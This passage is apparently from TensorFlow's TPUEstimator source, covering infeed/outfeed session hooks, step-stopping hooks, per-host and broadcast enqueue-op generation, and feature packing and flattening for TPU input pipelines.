tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
    # MeshTensorFlow since it places variables on TPU directly. Reinitializing
    # the TPU would cause variable corruption since the previously allocated
    # memory might be overwritten for other purposes.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
tf.compat.v1.logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [
tf.compat.v1.tpu.shutdown_system(job=self._master_job)
]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(tf.compat.v2.summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
tf.compat.v1.logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
tf.compat.v1.logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
tf.compat.v1.logging.debug('Infeed enqueue for iteration (%d, %d)',
count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
tf.compat.v1.logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
tf.compat.v1.logging.debug('Outfeed dequeue for iteration (%d, %d)',
count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
tf.compat.v1.logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
tf.compat.v1.logging.error('Compilation failed: {}'.format(
proto.status_error_message))
coord.request_stop()
else:
tf.compat.v1.logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
tf.compat.v1.logging.info('Init TPU system')
start = time.time()
with tf.Graph().as_default():
with tf.compat.v1.Session(
self._master, config=self._session_config) as sess:
sess.run(
tf.compat.v1.tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
tf.compat.v1.logging.info('Initialized TPU in %d seconds',
time.time() - start)
session.run(
self._init_ops,
options=tf.compat.v1.RunOptions(timeout_in_ms=30 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
tf.compat.v1.logging.info(
'Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(
session, shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
tf.compat.v1.logging.info('Enqueue next (%d) batch(es) of data to infeed.',
iterations)
self._infeed_controller.send_next_batch_signal(iterations)
tf.compat.v1.logging.info(
'Dequeue next (%d) batch(es) of data from outfeed.', iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
tf.compat.v1.logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
tf.compat.v1.logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
tf.compat.v1.logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
rendezvous=None,
master=None,
session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
  the following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
      iterations_per_loop_counter: A namedtuple of [`value`, `unit`] that
represents the number of 'iterations count' or 'time in seconds' to run
optimizer per loop, based on the `unit` specified, `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError('Only `count` or `seconds` are accepted as the '
                       '`iterations_per_loop_counter.unit`.')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = tf.compat.v1.train.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of the (`final step` -
`global step`), and the initial estimated iterations returned by the
estimator (by default is 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
tf.compat.v1.logging.info('ElapsedTime: %.3f', elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(tf.compat.v1.train.SessionRunHook):
  """Hook that sets the number of eval iterations per TPU loop."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
    # TPUInfeedOutfeedSessionHook print a nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise tf.errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
              'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=host_id,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
    By providing it as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with tf.compat.v1.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
features, labels, enqueue_datas_list = (
_tpu_estimator_embedding.split_inputs(
ctx,
features,
labels,
num_cores_per_batch=num_of_replicas_per_host))
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
device, host_id,
invocation_index):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=invocation_index,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain logical core 0, even when
# num_cores_per_replica > num_cores_per_host -- the caller makes sure that
# this host_id will be receiving data (i.e. it calls input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with tf.compat.v1.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for host in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
if ctx.allow_per_host_v2_parallel_get_next:
features, labels = inputs.features_and_labels() # Calls get_next()
with tf.control_dependencies(control_deps):
if not ctx.allow_per_host_v2_parallel_get_next:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share replica 0's stopping signal.
# This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
if len(enqueue_data) != 1:
raise RuntimeError(('Missing or extra enqueue_data for host {}. '
'len(enqueue_data) = {}.').format(
host, len(enqueue_data)))
enqueue_datas_list.append(enqueue_data[0])
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with tf.compat.v1.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0, host_id=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with tf.compat.v1.device(
ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas (including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
tf.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# For each core, slice out that core's share of the flattened_inputs.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, tf.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and shape[1] is not None and
shape[1] <= self._small_feature_dim_size):
tf.compat.v1.logging.log_first_n(
tf.compat.v1.logging.INFO,
'Found small feature: %s %s', 1, name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# Group the small features of this dtype only if we found at least
# `minimum_num_small_features_to_group` of them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as the feature key for concatenated '
'small features.'.format(key))
features[key] = (tf.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = tf.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
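# Example usage of `TensorPacker` (a sketch; the constructor arguments below
# are illustrative, not this module's defaults):
#
#   packer = TensorPacker(small_feature_dim_size=8,
#                         minimum_num_small_features_to_group=5)
#   packer.maybe_concatenate_features(features)  # packs small tensors in place
#   ...  # send `features` through infeed and dequeue them on the TPU side
#   packer.maybe_split_features(features)        # restores the original keys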
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
the call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples, one for each core.
TPUEstimator allows various structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested structure
supported by TF nest (namely, dicts, tuples, namedtuples, or any nested
structure of such, of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library,
as that expects flattened lists.
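For illustration, an `input_fn` returning a dataset of form 2 above could look
like this (a minimal sketch; `features_np` and `labels_np` stand for
user-provided numpy arrays):
```
def input_fn(params):
  dataset = tf.data.Dataset.from_tensor_slices((features_np, labels_np))
  return dataset.batch(params['batch_size'], drop_remainder=True)
```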
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
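# For illustration (a hypothetical sketch): with
#   features = {'x': <Tensor [8, 4, 4]>, 'y': <Tensor [8, 2]>}
#   feature_dims = {'x': [1, 2, 1], 'y': None}
# the result is [[1, 2, 1], None] (same order as the flattened features),
# with one extra None appended per label tensor when label_dims is None.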
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
